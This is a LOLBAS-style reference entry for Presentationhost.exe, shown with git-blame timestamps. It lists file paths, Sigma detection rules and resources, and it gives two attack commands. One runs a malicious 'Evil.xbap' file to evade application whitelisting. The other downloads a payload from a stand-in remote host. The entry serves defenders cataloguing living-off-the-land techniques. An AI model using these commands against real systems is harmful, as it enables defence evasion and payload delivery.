2018-06-09 00:15:06 +02:00
|
|
|
---
|
2018-09-24 21:59:43 +02:00
|
|
|
Name: Presentationhost.exe
|
|
|
|
Description: File is used for executing Browser applications
|
2022-10-04 13:27:31 +02:00
|
|
|
Author: Oddvar Moe
|
2021-01-10 16:04:52 +01:00
|
|
|
Created: 2018-05-25
|
2018-06-09 00:15:06 +02:00
|
|
|
Commands:
|
|
|
|
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
2018-09-24 21:59:43 +02:00
|
|
|
Description: Executes the target XAML Browser Application (XBAP) file
|
|
|
|
Usecase: Execute code within xbap files
|
|
|
|
Category: Execute
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1218
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
2022-10-04 13:27:31 +02:00
|
|
|
- Command: Presentationhost.exe https://example.com/payload
|
|
|
|
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
|
|
|
Usecase: Downloads payload from remote server
|
|
|
|
Category: Download
|
|
|
|
Privileges: User
|
|
|
|
MitreID: T1105
|
|
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
2018-12-10 14:28:12 +01:00
|
|
|
Full_Path:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Path: C:\Windows\System32\Presentationhost.exe
|
|
|
|
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
|
|
|
Detection:
|
2023-06-19 23:40:24 +02:00
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml
|
|
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml
|
2021-11-15 14:19:03 +01:00
|
|
|
- IOC: Execution of .xbap files may not be common on production workstations
|
2018-06-09 00:15:06 +02:00
|
|
|
Resources:
|
2018-09-24 21:59:43 +02:00
|
|
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
|
|
|
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
|
|
|
Acknowledgement:
|
|
|
|
- Person: Casey Smith
|
|
|
|
Handle: '@subtee'
|
2022-10-04 13:27:31 +02:00
|
|
|
- Person: Nir Chako (Pentera)
|
|
|
|
Handle: '@C_h4ck_0'
|